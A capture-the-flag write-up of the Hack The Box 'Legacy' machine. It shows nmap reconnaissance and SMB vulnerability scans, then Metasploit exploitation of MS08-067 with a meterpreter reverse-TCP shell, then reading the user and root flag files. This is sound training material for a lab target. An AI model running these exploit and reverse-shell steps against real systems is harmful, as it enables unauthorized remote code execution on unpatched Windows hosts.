Legacy
Introduction:
Recon
1# nmap -sS -sC -sV -T4 -oN nmap.legacy.txt 10.10.10.4
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 12:13 EST
3Nmap scan report for 10.10.10.4
4Host is up (0.012s latency).
5All 1000 scanned ports on 10.10.10.4 are filtered
6
7Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
8Nmap done: 1 IP address (1 host up) scanned in 24.01 seconds
9root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/legacy/data# nmap -sS -sC -sV -T4 -oN nmap.legacy.txt 10.10.10.4
10Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 12:37 EST
11Nmap scan report for 10.10.10.4
12Host is up (0.016s latency).
13Not shown: 997 filtered ports
14PORT STATE SERVICE VERSION
15139/tcp open netbios-ssn Microsoft Windows netbios-ssn
16445/tcp open microsoft-ds Windows XP microsoft-ds
173389/tcp closed ms-wbt-server
18Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
19
20Host script results:
21|_clock-skew: mean: -3h52m01s, deviation: 1h24m50s, median: -4h52m01s
22|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:9d:05 (VMware)
23| smb-os-discovery:
24| OS: Windows XP (Windows 2000 LAN Manager)
25| OS CPE: cpe:/o:microsoft:windows_xp::-
26| Computer name: legacy
27| NetBIOS computer name: LEGACY\x00
28| Workgroup: HTB\x00
29|_ System time: 2020-12-22T16:45:40+02:00
30| smb-security-mode:
31| account_used: guest
32| authentication_level: user
33| challenge_response: supported
34|_ message_signing: disabled (dangerous, but default)
35|_smb2-time: Protocol negotiation failed (SMB2)
36
37Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
38Nmap done: 1 IP address (1 host up) scanned in 62.74 seconds
39
1------------------------------------------------------------
2 Threader 3000 - Multi-threaded Port Scanner
3 Version 1.0.6
4 A project by The Mayor
5------------------------------------------------------------
6Enter your target IP address or URL here: 10.10.10.4
7------------------------------------------------------------
8Scanning target 10.10.10.4
9Time started: 2020-12-22 12:38:01.861772
10------------------------------------------------------------
11Port 139 is open
12Port 445 is open
13Port scan completed in 0:01:39.852210
14root@kinetic:/usr/share/nmap/scripts# pwd
15/usr/share/nmap/scripts
16root@kinetic:/usr/share/nmap/scripts# ls *smb*
17smb2-capabilities.nse smb-enum-groups.nse smb-ls.nse smb-server-stats.nse smb-vuln-ms08-067.nse
18smb2-security-mode.nse smb-enum-processes.nse smb-mbenum.nse smb-system-info.nse smb-vuln-ms10-054.nse
19smb2-time.nse smb-enum-services.nse smb-os-discovery.nse smb-vuln-conficker.nse smb-vuln-ms10-061.nse
20smb2-vuln-uptime.nse smb-enum-sessions.nse smb-print-text.nse smb-vuln-cve2009-3103.nse smb-vuln-ms17-010.nse
21smb-brute.nse smb-enum-shares.nse smb-protocols.nse smb-vuln-cve-2017-7494.nse smb-vuln-regsvc-dos.nse
22smb-double-pulsar-backdoor.nse smb-enum-users.nse smb-psexec.nse smb-vuln-ms06-025.nse smb-vuln-webexec.nse
23smb-enum-domains.nse smb-flood.nse smb-security-mode.nse smb-vuln-ms07-029.nse smb-webexec-exploit.nse
24root@kinetic:/usr/share/nmap/scripts#
25
26
Notes:
- The server runs extremely old OS - Windows XP
- SMB ports are open and allow guest login. Also message_signing: disabled is set. ms017-010 is possible.
Enumeration
1root@kinetic:/usr/share/nmap/scripts# pwd
2/usr/share/nmap/scripts
3root@kinetic:/usr/share/nmap/scripts# ls *smb*
4smb2-capabilities.nse smb-enum-groups.nse smb-ls.nse smb-server-stats.nse smb-vuln-ms08-067.nse
5smb2-security-mode.nse smb-enum-processes.nse smb-mbenum.nse smb-system-info.nse smb-vuln-ms10-054.nse
6smb2-time.nse smb-enum-services.nse smb-os-discovery.nse smb-vuln-conficker.nse smb-vuln-ms10-061.nse
7smb2-vuln-uptime.nse smb-enum-sessions.nse smb-print-text.nse smb-vuln-cve2009-3103.nse smb-vuln-ms17-010.nse
8smb-brute.nse smb-enum-shares.nse smb-protocols.nse smb-vuln-cve-2017-7494.nse smb-vuln-regsvc-dos.nse
9smb-double-pulsar-backdoor.nse smb-enum-users.nse smb-psexec.nse smb-vuln-ms06-025.nse smb-vuln-webexec.nse
10smb-enum-domains.nse smb-flood.nse smb-security-mode.nse smb-vuln-ms07-029.nse smb-webexec-exploit.nse
11root@kinetic:/usr/share/nmap/scripts#
12
1nmap -sS -sV --script smb-vuln* 10.10.10.4
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 12:51 EST
3Nmap scan report for 10.10.10.4
4Host is up (0.014s latency).
5Not shown: 997 filtered ports
6PORT STATE SERVICE VERSION
7139/tcp open netbios-ssn Microsoft Windows netbios-ssn
8445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
93389/tcp closed ms-wbt-server
10Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
11
12Host script results:
13| smb-vuln-cve2009-3103:
14| VULNERABLE:
15| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
16| State: VULNERABLE
17| IDs: CVE:CVE-2009-3103
18| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
19| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
20| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
21| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
22| aka "SMBv2 Negotiation Vulnerability."
23|
24| Disclosure date: 2009-09-08
25| References:
26| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
27|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
28| smb-vuln-ms08-067:
29| VULNERABLE:
30| Microsoft Windows system vulnerable to remote code execution (MS08-067)
31| State: LIKELY VULNERABLE
32| IDs: CVE:CVE-2008-4250
33| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
34| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
35| code via a crafted RPC request that triggers the overflow during path canonicalization.
36|
37| Disclosure date: 2008-10-23
38| References:
39| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
40|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
41|_smb-vuln-ms10-054: false
42|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
43| smb-vuln-ms17-010:
44| VULNERABLE:
45| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
46| State: VULNERABLE
47| IDs: CVE:CVE-2017-0143
48| Risk factor: HIGH
49| A critical remote code execution vulnerability exists in Microsoft SMBv1
50| servers (ms17-010).
51|
52| Disclosure date: 2017-03-14
53| References:
54| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
55| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
56|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
57
58Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
59Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds
60
Exploitation
Clearly, the host is vulnerable to mb-vuln-ms08-067 and smb-vuln-ms17-010, lets try both.
mb-vuln-ms08-067
1 exploit(windows/smb/ms17_010_psexec) > search ms08-067
2
3Matching Modules
4================
5
6 # Name Disclosure Date Rank Check Description
7 - ---- --------------- ---- ----- -----------
8 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
9
10
11Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
12
13msf6 exploit(windows/smb/ms17_010_psexec) > use 0
14[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
15msf6 exploit(windows/smb/ms08_067_netapi) >
16msf6 exploit(windows/smb/ms08_067_netapi) >
17msf6 exploit(windows/smb/ms08_067_netapi) >
18msf6 exploit(windows/smb/ms08_067_netapi) > show options
19
20Module options (exploit/windows/smb/ms08_067_netapi):
21
22 Name Current Setting Required Description
23 ---- --------------- -------- -----------
24 RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
25 RPORT 445 yes The SMB service port (TCP)
26 SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
27
28
29Payload options (windows/meterpreter/reverse_tcp):
30
31 Name Current Setting Required Description
32 ---- --------------- -------- -----------
33 EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
34 LHOST 10.0.0.8 yes The listen address (an interface may be specified)
35 LPORT 4444 yes The listen port
36
37
38Exploit target:
39
40 Id Name
41 -- ----
42 0 Automatic Targeting
43
44
45msf6 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
46lhost => tun0
47msf6 exploit(windows/smb/ms08_067_netapi) > set lport 4444
48lport => 4444
49msf6 exploit(windows/smb/ms08_067_netapi) > exploit
50
51[*] Started reverse TCP handler on 10.10.14.15:4444
52[*] 10.10.10.4:445 - Automatically detecting the target...
53[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
54[*] 10.10.10.4:445 - We could not detect the language pack, defaulting to English
55[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
56[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
57[*] Sending stage (175174 bytes) to 10.10.10.4
58[*] Meterpreter session 1 opened (10.10.14.15:4444 -> 10.10.10.4:1028) at 2020-12-22 13:56:03 -0500
59
60meterpreter > ls
61Listing: C:\WINDOWS\system32
62============================
63
64Mode Size Type Last modified Name
65---- ---- ---- ------------- ----
66100666/rw-rw-rw- 261 fil 2017-03-16 01:20:00 -0400 $winnt$.inf
6740777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 1025
68
69
Post-exploit/PrivEsc
1msf6 exploit(windows/smb/ms08_067_netapi) > exploit
2
3[*] Started reverse TCP handler on 10.10.14.15:4444
4[*] 10.10.10.4:445 - Automatically detecting the target...
5[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
6[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
7[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
8[*] Sending stage (175174 bytes) to 10.10.10.4
9[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.10.4:1029) at 2020-12-22 14:02:35 -0500
10
11meterpreter > pwd
12C:\
13meterpreter > sysinfo
14Computer : LEGACY
15OS : Windows XP (5.1 Build 2600, Service Pack 3).
16Architecture : x86
17System Language : en_US
18Domain : HTB
19Logged On Users : 1
20Meterpreter : x86/windows
21meterpreter > pwd
22C:\
23meterpreter > cd C:\Documents\ and\ Settings
24meterpreter > pwd
25C:\Documents and Settings
26meterpreter > ls
27Listing: C:\Documents and Settings
28==================================
29
30Mode Size Type Last modified Name
31---- ---- ---- ------------- ----
3240777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator
3340777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users
3440777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User
3540777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
3640777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService
3740777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john
38
39meterpreter > cd john
40lmeterpreter > ls
41Listing: C:\Documents and Settings\john
42=======================================
43
44Mode Size Type Last modified Name
45---- ---- ---- ------------- ----
4640555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Application Data
4740777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Cookies
4840777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Desktop
4940555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Favorites
5040777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Local Settings
5140555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 My Documents
52100666/rw-rw-rw- 524288 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT
53100666/rw-rw-rw- 1024 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT.LOG
5440777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 NetHood
5540777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 PrintHood
5640555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Recent
5740555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 SendTo
5840555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Start Menu
5940777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Templates
60100666/rw-rw-rw- 178 fil 2017-03-16 01:33:42 -0400 ntuser.ini
61
62meterpreter > cd Desktop
63meterpreter > ls
64Listing: C:\Documents and Settings\john\Desktop
65===============================================
66
67Mode Size Type Last modified Name
68---- ---- ---- ------------- ----
69100666/rw-rw-rw- 32 fil 2017-03-16 02:19:32 -0400 user.txt
70
71meterpreter > cat user.txt
72e6XXXXXXXXXXXXXXXXXXXXXXX4f
73meterpreter > pwd
74C:\Documents and Settings\john\Desktop
75meterpreter > cd ../../Administrator/Desktop
76meterpreter > ls
77Listing: C:\Documents and Settings\Administrator\Desktop
78========================================================
79
80Mode Size Type Last modified Name
81---- ---- ---- ------------- ----
82100666/rw-rw-rw- 32 fil 2017-03-16 02:18:19 -0400 root.txt
83
84meterpreter > cat root.txt
8599XXXXXXXXXXXXXXXXXXXXXXXXXX13
86meterpreter >
87
88
Notes: